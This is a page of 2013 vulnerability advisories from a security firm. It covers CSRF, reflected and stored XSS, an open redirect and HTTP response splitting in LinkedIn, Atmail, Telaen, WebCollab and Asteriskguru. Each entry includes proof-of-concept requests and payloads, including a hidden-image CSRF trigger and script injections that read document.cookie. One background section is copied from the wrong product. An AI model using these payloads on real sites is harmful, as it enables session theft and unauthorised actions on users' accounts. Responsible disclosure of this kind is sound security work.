Advisories 2013

2013-001: CSRF vulnerability in LinkedIn.

2013-002: Reflected XSS in Asteriskguru Queue Statistics.

2013-003: XSS vulnerability in LinkedIn.

2013-004: Reflected XSS in the view attachment message process of the Atmail WebMail <= v7.0.2.

2013-005: LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability.

2013-006: Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

2013-009: Multiple Vulnerabilities in Telaen <= 1.3.0.

2013-011: HTTP Response Splitting Vulnerability in WebCollab <= v3.30

2013-012: Multiple Full Path Disclosure Vulnerabilities in TinyWebGallery <= v1.8.9

2013-014: Multiple reflected XSS vulnerabilities in Atmail WebMail.

2013-016: CSRF vulnerability in LinkedIn

2013-017: SQL Injection vulnerability in "Project'Or RIA" allow arbitrary access to the database and the file system.

2013-018: Multiple XSS vulnerabilities in "Project'Or RIA".

2013-001: CSRF vulnerability in LinkedIn

Original release date: January 30th, 2013
Last revised: March 25th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Score)

BACKGROUND

LinkedIn is a social networking service and website (www.linkedin.com) for professionals. The site officially launched on May 5, 2003. As of September 30, 2012 (the end of the third quarter), professionals are signing up to join LinkedIn at a rate of approximately two new members per second. Actually, Over 175 million professionals use LinkedIn to exchange information, ideas and opportunities.

DESCRIPTION

CSRF (Cross-site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

More info about CSRF:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
LinkedIn is vulnerable to CSRF attacks in the "Add connections" functionality. Specifically, in the "Send Invitation" request. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.
An attacker can create a page that includes requests to the "Send Invitation" functionality of LinkedIn and add to his connections the users who, being authenticated, visit the page of the attacker.
The attack is facilitated since the "Send Invitation" request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the "Send Invitation" form.

PROOF OF CONCEPT

Next, we show a typical request to the "Send Invitation" functionality:

POST /fetch/manual-invite-create HTTP/1.1
Host: www.linkedin.com
...

emailAddresses=<email>&subject=Invitation+to+connect+on+LinkedIn&csrfToken=ajax:1234567890123456789&sourceAlias=0_cB6j7zv7bfEcbTWXQyKwqELvCi7FWQRq-jJsq2WDImH

Some parameters are not used/validated by the application, so we can remove these parameters from the request:
- csrfToken
- sourceAlias

Also, We can use HTTP GET method instead the HTTP POST method used at this request. This makes it more easy the exploitation of the CSRF vulnerability. So, finally, this HTTP request provoke the same result that the original HTTP POST request:

GET /fetch/manual-invite-create?emailAddresses=<email>&subject=Invitation+to+connect+on+LinkedIn

1. An attacker create a web page "csrf-exploit.html" that realize a HTTP GET request to the "Send Invitation" functionality.
For example:

...

<img src="http://www.linkedin.com/fetch/manual-invite-create?emailAddresses=&subject=" width=0 height=0>

...

2. A user authenticated in LinkedIn visit the "csrf-exploit.html" page controlled by the attacker.
For example, the attacker sends a mail to the victim (through the messaging system that provides LinkedIn is better as it ensures that the victim user is authenticated) and provokes that the victim visits his page (using social engineering techniques).
3. The attacker receives an invitation request from the victim user, so the attacker just accept this invitation and the user is added to his connections/contacts.

BUSINESS IMPACT

A malicious user can access to the information they share users that have been added to her contacts without his consent / knowledge.

SYSTEMS AFFECTED

LinkedIn service.

SOLUTION

Corrected by vendor.

REFERENCES

http://www.linkedin.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz vaguilera (at) isecauditors (dot) com)..

REVISION HISTORY

January 16, 2013: Initial release
March 30, 2013: New update

DISCLOSURE TIMELINE

January 16, 2013: Vulnerability acquired by Internet Security Auditors. March 10, 2013: Sent to Sec Team.
March 15, 2013: Notification about correction.
March 25, 2013: Sent to lists.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-002: Reflected XSS in Asteriskguru Queue Statistics.

Original release date:January 22nd, 2013
Last revised: March 10th, 2013
Discovered by: Manuel Garcia Cardenas
Severity: 4,8/10 (CVSS Base Score)

BACKGROUND

The Asteriskguru Queue Statistics, is a PHP based program, which gives anyone who uses queues or CDRs overview in Asterisk a deep insight in the quality of the service which is delivered to their customers. It is fully developped by the Asteriskguru developpers.

DESCRIPTION

Has been detected a reflected XSS vulnerability in Asteriskguru Queue Statistics , that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.
The code injection is done through the parameter warning in the page error.php.

PROOF OF CONCEPT

Malicious Request:

http://vulnerablesite.com/public/error.php?warning=< xss injection >

Example:

http://vulnerablesite.com/public/error.php?warning=< script >alert("XSS")< /script >

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

All Versions of Asteriskguru Queue Statistics.

SOLUTION

All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated.

REFERENCES

www.asteriskguru.com/tools/queue_stats.php
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).

REVISION HISTORY

January 22, 2013: Initial release

DISCLOSURE TIMELINE

January 22, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
January - February: Attempts to contact someone managing the project without answer.
March 10, 2013: Send to lists.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-003: XSS vulnerability in LinkedIn.

Original release date: March 3rd, 2013
Last revised: March 10th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Score)

BACKGROUND

LinkedIn is a social networking service and website (www.linkedin.com) for professionals. The site officially launched on May 5, 2003. As of September 30, 2012 (the end of the third quarter), professionals are signing up to join LinkedIn at a rate of approximately two new members per second.
Actually, Over 200 million professionals use LinkedIn to exchange information, ideas and opportunities.
More info: http://www.linkedin.com

DESCRIPTION

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

LinkedIn is vulnerable to XSS attacks during a DWR (Direct Web Remoting, a Java open source library) call through the "c0-id" parameter.
There are several instances of this issue:
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreativeText.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getBidSuggestion.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateClickThroughUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getCostAndMemberCount.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateRequiredFields.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.validateDisplayUrl.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.getExampleAds.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.changeBizAcctName.dwr
https://www.linkedin.com/ads/dwr/exec/SasAjax.updateAlertMessageId.dwr

PROOF OF CONCEPT

Next, we show a typical request to the "/ads/dwr/exec/SasAjax.validateCreative.dwr" resource:

                                     POST /ads/dwr/exec/SasAjax.validateCreative.dwr HTTP/1.1
                                     Host: www.linkedin.com
                                     ......

                                    callCount=1
                                    JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9
                                    c0-scriptName=SasAjax
                                    c0-methodName=validateCreative
                                    c0-id=5518_1360723319833
                                    c0-param0=string:
                                    c0-param1=string:
                                    c0-param2=string:
                                    c0-param3=string:
                                    c0-param4=string:
                                    c0-param5=string:
                                    c0-param6=string:en_US
                                    c0-param7=string:0
                                    c0-param8=string:0
                                    c0-param9=number:0
                                    xml=true
                           

Some parameters are not used/validated by the application, so we can remove these parameters from the request. The only parameters that are required by the application are:

                                - callCount
                                - JSESSIONID <== can have anything value, but must match the JSESSIONID
                               cookie
                               - c0-id <== vulnerable parameter (we can inject HTML/script code through this parameter)
                               - xml <== we need to change the value from "true" (default value) to "false" to make possible the script code injection
                         

Also, we can use HTTP GET method instead the HTTP POST method used at this request. This makes it more easy the exploitation of the XSS vulnerability. For example, we can inject script code to show an alert popup with the "document.cookie" value:

 c0-id=5518_1360723319833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!-- 

So, finally, this HTTP request provoke the XSS exploitation:

https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr?callCount=1&SESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9&c0-id=5578_1362323397833');</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT><!--&xml=false 

BUSINESS IMPACT

A malicious user can access to the information stored in the cookie on other users, so the attacker can spoof they identity and access to these user accounts.

SYSTEMS AFFECTED

http://www.linkedin.com

SOLUTION

Pending.

REFERENCES

http://www.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CREDITS

This vulnerability has been discovered and reported by Vicente Aguilera Diaz, vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

March 3, 2013: Initial release

DISCLOSURE TIMELINE

March 3, 2013: Vulnerability acquired by Internet Security Auditors.
March 11, 2013: Sent to Sec Team.
July 4, 2013: Initial vendor notification sent.
July 9, 2013: No update yet.
July 11, 2013: All issues reported should be resolved.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-004: Reflected XSS in the view attachment message process of the Atmail WebMail <= v7.0.2

Original release date: March 9th, 2013
Last revised: March 25th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Scored)
CVE-ID: CVE-2013-2585

BACKGROUND

Atmail allows users to access IMAP Mailboxes of any server of your choice. The software provides a comprehensive email-suite for accessing user mailboxes, and provides an inbuilt Calendar and Addressbook features. The WebMail Client of Atmail supports any existing IMAP server running under Unix/Linux or Windows systems.

DESCRIPTION

Has been detected a reflected XSS vulnerability in the view attachment message process of the Atmail WebMail, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.
The code injection is done through the file name parameter, and requires that the user victim is authenticated in the WebMail.

PROOF OF CONCEPT

When a user opens a file attachment in an email, the link is as follows:

http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/<file>

where:
- is the Atmail WebMail server
- is the unique ID for the message that contains the attachment
- is the attachment file in the message
A malicious user can inject arbitrary HTML/script code in the parameter. For example:

http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/test.txt<H1><marquee>This+is+an+XSS+example

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

Tested in Atmail 7.0.2. Other versions may be affected too.

SOLUTION

Update to version 7.0.3.

REFERENCES

http://www.atmail.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

March 9, 2013: Initial release

DISCLOSURE TIMELINE

March 9, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Contacts to Atmail without response.
March 19, 2013: Second attempt: Twitting. Third: Facebooking. Let's get Social!
March 21, 2013: Response and sent to Security Team.
March 25, 2013: Version 7.0.3 published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-005: LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability.

Original release date: 3rd March 2013
Last revised: 10th March 2013
Discovered by: Eduardo Garcia Melia
Severity: 5.2/10 (CVSS Base Scored)

BACKGROUND

Atmail allows users to access IMAP Mailboxes of any server of your choice. The software provides a comprehensive email-suite for accessing user mailboxes, and provides an inbuilt Calendar and Addressbook features. The WebMail Client of Atmail supports any existing IMAP server running under Unix/Linux or Windows systems.

DESCRIPTION

LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability. The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. The affected resource is http://www.linkedin.com/people/connections when you create new tags.

PROOF OF CONCEPT

=========================
First Option
=========================
You can go to LinkedIn Contacts -> Connections -> Manage. After, on the
"Add New Tag" field, you can put these tags, for example:

    + <IFRAME SRC=# onmouseover="alert('XSS')">
    + <IMG SRC=# onmouseover="alert('XSS')">
    + <IMG onmouseover="alert('XSS')">

Finally, you should pulse "Add New Tag" button, and then show you the injection.
=========================
Second Option
=========================
You can go to LinkedIn Contacts -> Connections -> All Connections and then select one contact.

After, on the right panel, you have a "Tags:" label, and you should pulse "Edit tags". Then you can put this tags, for example:

    + <IFRAME SRC=# onmouseover="alert('XSS')">
    + <IMG onmouseover="alert('XSS')">

Finally, you should pulse "+" button, and then show you the injection.
=========================
REQUESTS
=========================
First, create <IFRAME SRC=# onmouseover="alert('XSS')">  Tag:

REQUEST 1:

    POST /people/create-tag?csrfToken=TOKEN_CSRF HTTP/1.1
    Host: www.linkedin.com
    Origin: http://www.linkedin.com
    X-Requested-With: XMLHttpRequest
    X-IsAJAXForm: 1
    Cookie: XXXX
   
   
&tagContext=undefined&tagName=%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert('XSS')%22%3E

RESPONSE 1:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Content-Type: application/json;charset=UTF-8
    Content-Language: en-US
    Date: Sun, 03 Mar 2013 16:49:14 GMT
    X-FS-TXN-ID: 2b654458ea50
    X-FS-UUID: e0463ca154f7e712703c4a69cb2a0000
    X-LI-UUID: 4EY8oVT35xJwPEppyyoAAA==
    Age: 1
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0

    {"content":"113275897","status":"ok"}

Second, make request for show you the tags name's:

    REQUEST 2:
    POST /people/fetch-tags?csrfToken=ajax%3A7023500174643473361 HTTP/1.1
    Host: www.linkedin.com
    Origin: http://www.linkedin.com
    X-Requested-With: XMLHttpRequest
    User-Agent: MSIE 9.0
    X-IsAJAXForm: 1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Accept: */*
    Referer: http://www.linkedin.com/people/connections
    Cookie: XXX

    &tagContext=conn_detail_panel&memIds=M-220814631
   
Or without the csrfToken, because not verify that the csrfToken value matches with cookie session token.

RESPONSE:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Content-Type: application/json;charset=UTF-8
    Date: Sun, 03 Mar 2013 16:50:37 GMT
    X-FS-TXN-ID: 2b8fc977b850
    X-FS-UUID: a0d6d9c867f7e712d0ff6b10ed2a0000
    X-LI-UUID: oNbZyGf35xLQ/2sQ7SoAAA==
    Age: 0
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0

   
{"content":"[\"{\\\"id\\\":\\\"104055107\\\",\\\"name\\\":\\\"<IFRAME
SRC=# onmouseover=

\\\\\\\"alert('XSS')\\\\\\\">\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\

\"104044777\\\",\\\"name\\\":\\\"classmates\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id

\\\":\\\"104044787\\\",\\\"name\\\":\\\"colleagues\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",

\"{\\\"id\\\":\\\"104044767\\\",\\\"name\\\":\\\"friends\\\",\\\"bucket\\\":\\\"tagsAllHave\\

\"}\",\"{\\\"id\\\":\\\"104044797\\\",\\\"name\\\":\\\"group
members\\\",\\\"bucket\\\":\\

\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044807\\\",\\\"name\\\":\\\"partners\\\",\\\"bucket\\

\":\\\"tagsNoneHave\\\"}\"]","status":"ok"}

BUSINESS IMPACT

If a malicious user will find a way to exploit this vulnerability could make other users are perform actions that he wanted in the application, since add them to your network, to erase the profile, because the csrf token is useless, since based on the user's session.

SYSTEMS AFFECTED

The vulnerability affects the LinkedIn network:
http://www.linkedin.com
https://touch.www.linkedin.com

SOLUTION

Linkedin applied a new contact management system.

REFERENCES

http://www.linkedin.com
http://www.isecauditors.com
http://en.wikipedia.org/wiki/Cross-site_scripting#Persistent

CREDITS

These vulnerabilities have been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 03, 2013: Initial release

DISCLOSURE TIMELINE

March 03, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Send to Sec Team.
July 4, 2013: Initial vendor notification sent
July 9, 2013: Vendor implemented a fix
November 11, 2013: Disclosure

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-006: Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

Original release date: 4th March 2013
Last revised: 25th March 2013
Discovered by: Eduardo Garcia Melia
Severity: 4.3/10 (CVSS Base Scored)

BACKGROUND

LinkedIn is a social networking service and website(http://www.linkedin.com/) operates the world's largest professional network on the Internet with more than 187 million members in over 200 countries and territories.
More Information: http://press.linkedin.com/about

DESCRIPTION

LinkedIn Investors is affected by Multiple reflected Cross-Site Scripting vulnerabilities. An attacker can inject HTML or script code in the context of victim's browser, so can perform XSS attacks, and steal cookies of a targeted user. The affected resource is http://investors.linkedin.com.

PROOF OF CONCEPT

The XSS vulnerability its in User-Agent:

===============
First XSS
===============
	GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Cache-Control: max-age=0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2
===============
Second XSS
===============
	GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2
===============
Third XSS
===============	
	GET /stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'-- HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Referer: http://investors.linkedin.com/stocklookup.cfm
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2
===============
Fourth XSS
===============	
	GET /calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate HTTP/1.1
	Host: investors.linkedin.com
	Proxy-Connection: keep-alive
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	User-Agent: <script>alert("XSS")</script>
	Referer: http://investors.linkedin.com/calculator.cfm
	Accept-Encoding: gzip,deflate,sdch
	Accept-Language: en-US,en;q=0.8
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
	Content-Length: 2

RESPONSE in all cases:

        HTTP/1.1 500 Internal Server Error
	Connection: close
	Date: Mon, 04 Mar 2013 11:34:48 GMT
	Server: Microsoft-IIS/6.0
	X-Powered-By: ASP.NET
	server-error: true
	Content-Type: text/html; charset=UTF-8

	

Error occurred processing request

Error Diagnostic

<cfoutput> Element RESULT.TITLE is undefined in RELEASEDETAIL.
The error occurred on line 175. Date/Time: Mon Mar 04 06:34:48 EST 2013
Browser: <script>alert("XSS")</script>
Remote Address: 192.168.149.88

</cfoutput>

BUSINESS IMPACT

This flaw can be used by a malicious user to send phishing to the linked in customers, abusing of the users trust on LinkedIn portal, tricking the user. This user can be forward to a LinkedIn clone site to stolen credentials, to some malicious site hosting malware and more.

SYSTEMS AFFECTED

The vulnerability affects the LinkedIn Investors: http://investors.linkedin.com

SOLUTION

Corrected by vendor.

REFERENCES

http://investors.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)

CREDITS

These vulnerabilities have been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 04, 2013: Initial release
March 10, 2013: Second release

DISCLOSURE TIMELINE

March 04, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Sent to Sec Team.
March 25, 2013: Request for update. Response regarding it was already corrected. Sent to lists.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-009: Multiple Vulnerabilities in Telaen <= 1.3.0

Original release date: March 15th, 2013
Last revised: June 4th, 2013
Discovered by: Manuel Garcia Cardenas
Severity: 4,8/10 (CVSS Base Score)
CVE-ID: CVE-2013-2621,
CVE-2013-2623,
CVE-2013-2624

BACKGROUND

Telaen is a webmail reader application supporting both IMAP and POP3 protocols. It can be installed without dependence of any PHP's extra modules or a separate database. It is Open source software published under GNU General Public License (GPL).
The last version of Telaen is 1.3.0 released on January 2012.

DESCRIPTION

Telaen 1.3.0 and lower versions contain a flaw that allows a remote redirection attack. This flaw exists because the application does not properly sanitise the file "redir.php". This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choice.
Aditionaly, it has been detected a reflected XSS vulnerability in Telaen 1.3.0 and lower versions, that allows the execution of arbitrary HTML/JavaScript code to be executed in the context of the victim user's browser. The code injection is done through the parameter "f_email" in the page index.php.
Due to the errors caused by the application Telaen 1.3.0 and lower versions, we can display the full webapp installation path.

PROOF OF CONCEPT

 REDIRECT: http://vulnerablesite.com/telaen/redir.php?http://www.malicious-site.com

 XSS: http://vulnerablesite.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script>

FULL PATH DISCLOSURE: http://vulnerablesite.com/telaen/inc/init.php

BUSINESS IMPACT

REDIRECT: An attacker can redirect any user to any malicious website. Below I have mentioned the vulnerable URL.
XSS: An attacker can execute arbitrary HTML or JavaScript code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.
FULL PATH DISCLOSURE: An attacker can obtain the full path to the applitation and if the webroot is getting leaked, attackers may abuse the knowledge and use it in combination with file inclusion vulnerabilites to steal configuration files regarding the web application or the rest of the operating system.

SYSTEMS AFFECTED

Versions of Telaen < v1.3.1.

SOLUTION

REDIRECT AND XSS: All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated.
FULL PATH DISCLOSURE: Turn off display errors in the configuration and unify the error pages.

REFERENCES

http://www.telaen.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 15, 2013: Initial release.
June 4, 2013: Last release

DISCLOSURE TIMELINE

March 15, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 20, 2013: Sent to Devel Team.
March 28, 2013: Schedule for new version.
April 4, 2013: New version published.
June 3, 2013: Advisory sent to lists.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-011: HTTP Response Splitting Vulnerability in WebCollab <= v3.30

Original release date: March 21st, 2013
Last revised: March 21st, 2013
Discovered by: Manuel Garcia Cardenas
Severity: 5/10 (CVSS Base Score)
CVE-ID: CVE-2013-2652

BACKGROUND

WebCollab is a collaborative Web site for project workgroups. It aims to be easy and intuitive to use without being complicated or graphically intensive.
It uses a MySQL/PostgreSQL database backend coupled with PHP scripting and the Apache webserver.
The last version of WebCollab is 3.30 (Aotuhia) released on February 2013.

DESCRIPTION

An input validation problem exists within WebCollab which allows injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) characters into the server HTTP response header, resulting in a HTTP Response Splitting Vulnerability.
The vulnerability exists in the "item" parameter on the page "/help/help_language.php".

This vulnerability not only gives attackers control of the remaining headers and body of the server response, but also allows them to create additional responses entirely under their control.

PROOF OF CONCEPT

                  Malicious Request:

http://vulnerablesite.com/webcollab/help/help_language.php?item=%0d%0a%20FakeHeader%3a%20WriteYourOwnHeader&lang=en&type=help

                  Server Response:

                      HTTP/1.1 302 Found
                      Server: Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7
                      Location: http://vulnerablesite.com/webcollab/help/en_help.php#
                      FakeHeader: WriteYourOwnHeader
                      Content-Length: 0
                      Content-Type: text/html
        

BUSINESS IMPACT

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted. Other attacks are also possible.

SYSTEMS AFFECTED

WebCollab <= v3.30

SOLUTION

All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated.

                               Validate the parameter "item" on the page "/help/help_language.php" line 34:

                                   $help_item = $_GET['item'];

                                   switch($_GET['type'] ) {
                                   case 'admin':
                                   header('Location:
                                   '.BASE_URL.'help/'.$lang_prefix.'_help_admin.php#'.$help_item );
                                   break;

                                   case 'help':
                                   default:
                                   header('Location:
                                   '.BASE_URL.'help/'.$lang_prefix.'_help.php#'.$help_item );
                                   break;
                      

REFERENCES

http://webcollab.sourceforge.net
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 21, 2013: Initial release.

DISCLOSURE TIMELINE

March 21, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 22, 2013: CVE-ID requested and received.
October 17, 2013: First contact with the developer. We send pre-advisory
October 18, 2013: Developer team release a new version
October 24, 2013: Advisory Release

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

